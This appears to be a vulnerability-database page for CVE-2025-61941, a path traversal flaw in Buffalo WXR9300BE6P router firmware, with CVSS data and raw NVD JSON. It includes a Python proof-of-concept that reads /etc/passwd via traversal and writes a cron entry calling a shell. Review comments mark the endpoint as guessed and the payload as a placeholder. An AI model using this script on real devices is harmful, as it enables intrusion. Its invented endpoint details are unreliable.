Security Vulnerability Report
CVE-2025-61941 CVSS 7.2 HIGH

CVE-2025-61941

Published: 2025-10-15 08:15:39
Last Modified: 2026-04-15 00:35:42

Description

A path traversal issue exists in WXR9300BE6P series firmware versions prior to Ver.1.10. Arbitrary file may be altered by an administrative user who logs in to the affected product. Moreover, arbitrary OS command may be executed via some file alteration.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Buffalo WXR9300BE6P series firmware < Ver.1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
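# CVE-2025-61941 - Buffalo WXR9300BE6P Path Traversal PoC
#
# This PoC demonstrates the path traversal vulnerability in the router's
# file management interface.
# Note: Requires valid administrator credentials (the CVSS vector on this
# page carries PR:H).
#
# NOTE(review): the CGI path, the `req` / `fpath` query parameters and the
# login form fields are not stated in the advisory text on this page, and
# the original comment below marks the endpoint as "example - actual
# endpoint may vary". Read the script as an illustration of the bug class
# (CWE-22), not as a confirmed reproduction.
#
# Remediation: the description lists firmware versions prior to Ver.1.10 as
# affected, so update to Ver.1.10 or later. As general hardening, keep the
# management interface reachable only from trusted hosts.
import requests
from urllib.parse import quote

TARGET_HOST = "http://192.168.11.1"  # Default Buffalo router management IP
# Placeholder credentials from the original listing; do not commit real ones.
ADMIN_USER = "admin"
ADMIN_PASS = "password"

# Step 1: Authenticate to the router management interface
session = requests.Session()
login_url = f"{TARGET_HOST}/cgi-bin/cgi.cgi"
login_data = {
    "username": ADMIN_USER,
    "password": ADMIN_PASS,
    "login": "Login",
}
response = session.post(login_url, data=login_data)
# Login success is inferred from a "Logout" string in the response body.
if "Logout" not in response.text:
    print("[-] Authentication failed")
    # SystemExit instead of exit(): the exit() builtin is injected by the
    # `site` module and is absent when Python runs with -S.
    raise SystemExit(1)
print("[*] Authenticated successfully")

# Step 2: Exploit path traversal to read arbitrary file
# NOTE(review): the advisory text describes file *alteration*; a read
# primitive is this script's assumption.
# Craft malicious path with directory traversal sequences
malicious_path = "../../../../../../etc/passwd"
# quote() leaves "." and "/" untouched, so the request carries the literal
# "../" sequence. That literal is what a log search or filtering rule on
# the management interface can match.
encoded_path = quote(malicious_path)

# File operation endpoint (example - actual endpoint may vary)
file_url = f"{TARGET_HOST}/cgi-bin/cgi.cgi?req=fw&fpath={encoded_path}"
response = session.get(file_url)
# HTTP 200 only shows that the server answered; the printed body still has
# to be inspected to tell file content from an ordinary page.
if response.status_code == 200:
    print(f"[*] File content retrieved:\n{response.text}")
else:
    print(f"[-] Exploit failed with status code: {response.status_code}")

# Step 3: Write arbitrary file via path traversal
# Modify a system file to achieve command execution
# NOTE(review): nothing on this page shows that the device reads the path
# below, and the payload is a non-functional placeholder string.
target_file = "../../../../../../tmp/crontab"
command_payload = "* * * * * /bin/sh -c 'reverse_shell'\n"
write_url = f"{TARGET_HOST}/cgi-bin/cgi.cgi?req=fw&fpath={quote(target_file)}"
response = session.post(write_url, data={"content": command_payload})
if response.status_code == 200:
    # The original message claimed "RCE achieved" on a bare HTTP 200. The
    # status code proves neither the write nor any command execution, so
    # the message now reports only what was observed.
    print("[*] Write request returned HTTP 200 - file write and command execution not verified")
else:
    print("[-] File write failed")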

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61941", "sourceIdentifier": "[email protected]", "published": "2025-10-15T08:15:38.827", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal issue exists in WXR9300BE6P series firmware versions prior to Ver.1.10. Arbitrary file may be altered by an administrative user who logs in to the affected product. Moreover, arbitrary OS command may be executed via some file alteration."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": 
"NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://jvn.jp/en/vu/JVNVU96471278/", "source": "[email protected]"}, {"url": "https://www.buffalo.jp/news/detail/20251014-01.html", "source": "[email protected]"}]}}